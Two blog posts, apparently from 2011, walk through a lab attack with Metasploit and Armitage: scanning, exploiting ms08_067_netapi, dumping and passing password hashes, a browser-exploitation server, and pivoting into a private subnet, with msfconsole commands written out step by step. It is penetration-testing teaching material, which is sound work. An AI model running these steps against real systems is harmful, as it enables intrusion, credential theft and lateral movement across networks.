Wednesday, October 26, 2011

Illustrating the Process of a Network Attack with Armitage


This post will be demonstrating the same attack as the previous post but through Metasploit’s GUI front-end tool named, Armitage.  An attacker is able to discover hosts or scan a network with the integrated Nmap tool, provide an automated list of vulnerabilities for each host depending on the open ports/services running, subsequently the attacker will just point and click to exploit a vulnerability from the list that is provided and transmit a payload to compromise and control the victim.  The following phase is where I feel Armitage is better than ‘msfconsole.’ 
Armitage has great benefits in the ‘post-exploitation’ phase.  One, an attacker is able to interact with multiple machines at once, versus having to ‘background’ a meterpreter session to interact with another.  Another benefit with the use of Armitage is the incredible ease of browsing files and downloading/uploading files to the victim’s computer.  Lastly, an attacker would be able to pivot (hop) to network’s that were not directly accessible. 
Below is a graphical illustration of the process an attacker would use with the Armitage tool.

Now, onto the demonstration.  The following explains the network setup:
First Network (192.168.1.0/24)
·         BackTrack 5            192.168.1.121
·         Windows XP SP3  192.168.1.118
·         Windows 7             192.168.1.119
Windows 2003 web server with two interfaces; each facing a different network.
·         192.168.1.105 / 192.168.56.102
Second Network (192.168.56.0/24)
·         Windows XP SP2   192.168.56.103
Host Discovery (Information Gathering)
o Start Armitage by going to BackTrack/Exploitation Tools/Network Exploitation Tools/Metasploit Framework/armitage
o Click ‘Start MSF’
o Select Hosts/Nmap Scan/Quick Scan (OS detect)
o Enter your target network and click ‘OK’. I entered the ‘First Network,’ 192.168.1.0/24
o Wait until the pop-up message displays ‘Scan Complete!’ and click ‘OK.’
o A graphical icon list – depending on OS – will be displayed.
Analyze Scan Data for Exploits and Determine a Remote Attack or Client-Side Attack
o Go to the menu and select Attacks/Find Attacks/by port
Attack by ports is selected since we performed an Nmap scan, which gathered a list of open ports and services running.
You would select ‘by vulnerability’ if a completed vulnerability scan, such as, Nessus would have been imported.
o Wait until a pop-up message is displayed stating ‘Attack Analysis Complete…’ and click ‘OK’
From here, you can go to any host and right-click to select ‘Attack’ to view a list of vulnerabilities and the menu to the right will list known exploits for those vulnerabilities.
o I right-clicked on the ‘192.168.1.105’ (Windows 2003) machine and selected the ‘ms08_067_netapi’ exploit.  This exploit never fails at owning/compromising a Windows XP or Windows 2003 machine.  Click ‘Launch’ to transmit the payload for a meterpreter session.
o I chose the same exploit for ‘192.168.1.118’ (Windows XP SP3).
Post-Exploitation Phase
o Now, I will perform ‘post-exploitation’ on the compromised hosts.
o For the 192.168.1.118, I migrated to a different task by right-clicking on the host and selecting Meterpreter/Access/Migrate Now!
o On the same host (192.168.1.118), I right-clicked and selected Meterpreter/Interact/Run VNC.
o A pop-up message will display the port to connect to a VNC session.
o I open a ‘Konsole’ and type the command vncviewer 127.0.0.1:[port]. The port changes everytime you select to run a VNC session.
o Press enter, and TightVNC or the VNC program you have installed will open.  You will be able to have complete view and control of the victim’s machine.  Well, the meterpreter session gives the attacker complete control, especially with the greater amount of scripts an attacker is able to run in ‘msfconsole.’  Anyways, I pulled up the 192.168.1.118 host next to the VNC session for further clarity.
o For the 192.168.1.105, I will browse the directories on the computer by right-clicking on the host and selecting Meterpreter/Explore/Browse Files.  Armitage displays a great graphical interface to browse the files; along with the capability of downloading or uploading files.
o Next, I will display the capability of taking a screenshot of the victim’s computer by right-clicking and selecting Meterpreter/Explore/Screenshot.
o After that, I will dump (collect) the user names and hashes (passwords) by right-clicking on the host and selecting Meterpreter/Access/Dump Hashes/lsass method.
o Wait for the pop-up message that states ‘Hashes dumped’ and click ‘OK.’  To display them, go to the menu and click View/Credentials.
o Conveniently, the attacker is able to try and crack the passwords by selecting ‘Crack Passwords’ and using the default wordlist or loading a custom wordlist.
o Luckily, with Windows machines, we can perform a technique called ‘Pass the Hash.’  There is no need to know the password, if the attacker has the username with the correct hash that will be enough to gain authorization.
Network Pivoting
o Once the attacker has reached a goal with the compromised hosts or determines there isn’t anything of value, an ARP scan would be the next logical step to determine if the hosts are connected to other networks that are not directly accessible to the attacker.

An ARP (Address Resolution Protocol) sends requests packets to hosts within the local area network to determine the MAC (hardware) address of the requested host through the known IP (Internet Protocol) address.

o I right-click on the 192.168.1.105 host since it was a server and select Meterpreter/ARP Scan.
o On the pop-up, I select the unknown network (192.168.56.0) to view a list of hosts IP addresses and MAC addresses.
In essence, we are now starting the attack process again.  We discovered new hosts, then we analyze the open services and vulnerabilities, then determine exploit.  Pivoting allows an attacker to go deep into the network.
Next, I need to setup a pivot.  Through this method, I will set a stager on the server and this will allow me to seem as if I am an authorized user on the server in order to interact with the other hosts.
o Right-click the Windows 2003 (192.168.1.105) and select Meterpreter/Pivoting/Setup.
o Select the second network (192.168.56.0) and click ‘Add Pivot.’
o The pivot will be successful when a pop-up message states ‘Route added.’  You will see the Windows 2003 displaying an arrow to each of the hosts in the new network.
Hit Ctrl+H to display a clearer connection from the 2003 Server to the newly discovered hosts.
Now, we need to scan the unknown hosts to determine the OS and open services running.
o Right-click on an unknown host and click ‘scan’ and click ‘OK’ for the pop-up message.
o I right-click host 192.168.56.102 and select Login/psexec.  This will allow me to perform ‘Pass the Hash’ technique on the host with previously collected usernames and hashes.
I wait until the process is complete to find successful login information.
o I right-click host 192.168.56.102 and select Login/psexec.  I select the successful user and pass login and click ‘Launch.’
o With the correct username/hash (password), I will have authorization over the machine.
I forgot to compromise the Windows 7 machine and decided to do it at that moment.
o Go to the menu and select Attacks/Browser Autopwn
This will set the attacker’s IP address as a web server; furthermore, it will load up a collection of modules that will be able to perform ‘browser-fingerprinting’ to any client that visits the attacker’s malicious IP address.  At that moment, it will determine the type and version of the victim’s browser and exploit the visitor’s machine for the attacker to gain full control.
o The Browser AutoPWN will be preloaded with required settings.  You just have to set the URI path.  That is the path after the attacker’s IP address.  I just enter ‘/’  Also, you can set the SRVPORT to 80.  That is default port for a web server so the victim just has to visit the address without a port set following the address.
o The IP address that needs to be visited will be displayed when the web server is up and running.
o The address is http://192.168.1.121:8080
o I go to my Windows 7 machine and open IE 8 and visit the malicious site.
o Fortunately, we owned another box.

Monday, October 10, 2011

Pivoting into Other Systems with Metasploit


Pivoting is a powerful technique within the Metasploit Framework that allows a hacker to access a private subnet within a network.  For example, an attacker would compromise a host (ex: web server) that is accessible (i.e., routable IP address) and use that host as a staging point to pivot and compromise other systems in subnets that would not have been accessible from outside the network.  According to Metasploit, pivoting is a Meterpreter method that allows for the attack of other systems on a network through the Meterpreter console.

For this setup, I will use the following VirtualBox virtual machines:
·         BackTrack 5 R1
o   Attacker machine
o   192.168.1.107
·         Windows Server 2003
o   Web Server
o   Accessible (Public IP) – 192.168.1.105
o   Non-accessible (Private IP)  – 192.168.56.102
·         Windows XP
o   Host machine
o   192.168.56.103
In the following tutorial, I will use the BackTrack 5 machine to exploit the web server (Windows Server 2003) and setup a staging point on the server for pivot to the Windows XP host that is only accessible to users inside the network.
First, I will map the network with Nmap to discover any accessible hosts
·         nmap -sS 192.168.1.1/24
Once I discovered 192.168.1.105, I will scan for open ports and services running
·         nmapsV -O 192.168.1.105
The scan informs me that port 80 (web server port for public access) is running an Apache Web Server; along with port 135 and port 139.  I use the Windows netapi exploit, known as “Server Service Vulnerability.”
·         use windows/smb/ms08_067_netapi
·         show payloads
·         set PAYLOAD windows/meterpreter/bind_tcp
o   Bind shell is a payload that “binds” a command prompt to a listening port on the target machine, which the attacker can then connect and maintain access to the machine.
·         show options
o   View what settings are needed.
·         set RHOST 192.168.1.105
·         show targets
o   To specify our specific target
·         set target 9
o   Target 9 is Windows Server 2003 SP1
·         exploit
Once the host is exploited, a meterpreter session is created and our machine has direct access and control over the machine.  We confirm this by entering the ipconfig command to view the IP address.  The command returns:
·         192.168.1.105 / 255.255.255.0
·         192.168.56.102 / 255.255.255.0
Since we do not have access to the 192.168.56.0 network, we will run an ARP scan and discover hosts that are up in the network.
·         run arp_scanner -r 192.168.56.1/24
With the discovered network and hosts, we will setup a route to have the private network send packets (data) through our machine (meterpreter session id).  First, we have to background our meterpreter session.
·         background
·         route add 192.168.56.1 255.255.255.0 1
o   The command will route the subnet traffic through our meterpreter session id, 1.
o   You can view the session id by entering the command sessions –l
·         route print
o   To view the previously entered command
We need to do a port scan on the discovered host from the arp_scan to find a port that we can setup communication.  First, we need to go back and access the auxiliary module for TCP port scanning.  The required settings that will be set is the remote host (RHOSTS).
·         back
·         use scanner/portscan/tcp
·         show options
·         set RHOSTS 192.168.56.103
·         run
Port 25, 80, 135, and 139 are open.  We will use the RPC exploit in port 135 and subsequently have direct access and control over the machine with a meterpreter session.
·         back
·         use windows/smb/ms08_067_netapi
·         show options
·         set RHOST 192.168.56.103
·         set PAYLOAD windows/meterpreter/bind_tcp
·         show options
·         show targets
o   To specify our specific target
·         set target 9
o   Target 3 is Windows XP SP2
·         exploit
A meterpreter session should be created and the attacker machine has full control of the compromised host in the private subnet.  Type ipconfig to view the compromised host IP configuration.
Background the meterpreter session by entering the command background.
View your sessions by typing sessions.
The output will display the steps you have taken to get from your machine to the host in the private subnet under the “Connection” column.
  • 192.168.1.107:59377 -> 192.168.1.105:4444
    • From the attacker machine to the web server
  • 192.168.1.107-192.168.1.105:0 -> 192.168.56.103:4444
    • From the web server to the XP host